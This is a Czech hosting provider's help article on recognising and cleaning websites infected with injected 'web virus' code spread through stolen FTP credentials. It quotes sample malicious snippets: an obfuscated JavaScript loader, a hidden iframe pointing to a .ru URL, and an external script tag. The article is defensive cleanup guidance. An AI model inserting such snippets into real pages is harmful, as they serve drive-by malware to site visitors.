Webové viry


Návody pro C4


Webové stránky byly pravděpodobně napadeny virem, pokud při natahování webových stránek dochází k jedné z následujících událostí:

Varovné okno antiviru
Při přístupu na zavirované webové stránky zobrazí Norton Antivirus v pravém dolním rohu varovné okno.
Podrobný popis webového viru
Větší obrázek
Podrobný popis bezpečnostního rizika (webového viru) v programu Norton Antivirus.
Okno s aktivací prvků ActiveX
Pokud vyskakuje okno s aktivací prvků ActiveX, které se v minulosti neobjevovalo, pravděpodobně vaše webové stránky napadnul virus.

Příklad viru ve zdrojovém kódu HTML stránky (resp. PHP skriptu):

<!--[z0s]--><script>document.write(unescape("%3Cscript%3Eif%28Qg
%21%3D1%29%7Bfunction%20JI%28fR%29%7Breturn%20fR%7Dtry%7Bfunctio
n%20wcr%28jzA%29%7Breturn%20parseInt%28jzA%29%7Dvar%20XSf%3D%276
E+%3D2%29%7BSqs%3Dsjz.substr%28zGE%2C2%29%3Bfor%28ZSk%3D0%3BZSk%
3CXSf.length%3BZSk++%29%7Bif%28XSf%5BZSk%5D%3D%3DSqs%29break%3B%
7DVBy+%3DString.fromCharCode%28QdU%5BZSk%5D%5E132%29%3B%7Ddocume
nt.write%28VBy%29%3B%7Dcatch%28nxu%29%7B%7D%7Dvar%20Qg%3D1%3C/sc
ript%3E"))</script><!--[/z0s]-->

Následuje ukázka viru ve zdrojovém kódu, který odkazuje na stránky s nebezpečným obsahem. Po zobrazení stránky se spustí skrytá aplikace na pozadí a vir se vám nahraje na počítač (pokud se mu podaří zneužít nějakou bezpečnostní chybu v internetovém prohlížeči).

<div style="display:none">kswugmkyvsbzcxeeklnefrztojbcbvh<iframe width=455 height=359 src="http://b-i-o-v.ru:8080/index.php" ></iframe></div>

nebo

<!-- ad --><script language=javascript src="http://crew.abnc-portal.com/show.js"></script><!-- /ad -->

Jak fungují webové viry

Zavirování webových stránek je většinou způsobeno zneužitím FTP účtu webových stránek. Útočník získá FTP přístup k vašim webovým stránkám typicky jedním ze dvou způsobů:

Útočník, který má uloženy přístupové údaje na vaše webové stránky, se může kdykoliv rozhodnout je zneužít k nejrůznějším účelům, např. k rozesílání spamů a virů nebo k útokům na jiné počítače. FTP přístup na vaše webové stránky většinou využije i k dalšímu šíření viru. Do stránek umístí kód webového viru (příklad takového kódu je uveden výše), může se např. jednat o kód v Javascriptu, který dokáže využít neopravených chyb v internetovém prohlížeči a každému návštěvníkovi (jehož prohlížeč nemá opravenou příslušnou chybu) nainstaluje do počítače skutečný virus. Nainstalovaný virus kromě jiných věcí (např. zneužije počítač návštěvníka k rozesílnání spamu, k útokům na jiné počítače apod.) následně odešle všechny uložené FTP přístupy útočníkovi a vše se opakuje. Virus se tedy šíří pomocí kódu přidaného do webových stránek - proto název webový virus.

Postup pro odvirování

K úniku přístupových údajů (jméno a heslo pro FTP přístup na web) mohlo dojít na jiném než na vašem osobním počítači. Pokud jste např. používali FTP přístup v internetové kavárně, mohl tam být virus, který údaje "odposlechl" a zaslal je do databáze útočníkovi. Pokud je váš web zavirovaný, neznamená to tedy nutně, že máte zavirovaný osobní počítač. Máte-li kvalitní antivirus s pravidelnou aktualizací databáze virů, můžete postupovat dle bodů 4. a 5., v opačném případě postupujte dle všech níže uvedených instrukcí.

  1. Nainstalujte si kvalitní antivirus, případně ho zaktualizujte. Doporučujeme například Norton Antivirus od společnosti Symantec. Pro verzi viru ve zdrojovém kódu doporučujeme stažení aplikace ze stránek http://www.freedrweb.com.
  2. Udělejte kompletní prověření všech diskových jednotek a počítač odvirujte.
  3. Zrestartujte počítač
  4. Změňte všechna hesla v administračním systému - heslo pro vstup do administračního systému k doméně, hesla pro FTP přístup k webům, hesla k emailovým schránkám a hesla k databázím.
  5. Smažte obsah webu a nahrajte tam nezavirované stránky ze zálohy. Pokud se jedná o vir ve zdrojovém kódu, stačí škodlivý kód nalézt a smazat.
  6. Udržujte antivir aktualizovaný.

Odvirování aplikace Joomla 1.5

Pokud se jedná o napadenou instalaci aplikace Joomla 1.5, detailní postup naleznete v článku Joomla 1.5 - Odvirování napadených stránek.

Diskuzní fórum pro článek Webové viry

Nové diskuzní téma můžete založit v sekci Ostatní.

Témata Reakce Poslední příspěvek
Útok na web 13 31.03.2011 17:55
Zabezpečení stránek 4 09.01.2010 15:33

Změny a kontroly

K dispozici je kompletní přehled všech změn a kontrol v tomto návodu.


Webové viry
Publikace: 17.9.2007
Změna: 17.7.2013
Přehled změn a kontrol
Diskuzní fórum
  • Webové aplikace
  • Tvorba web stránek
  • PHP, MySQL

forum.c4.cz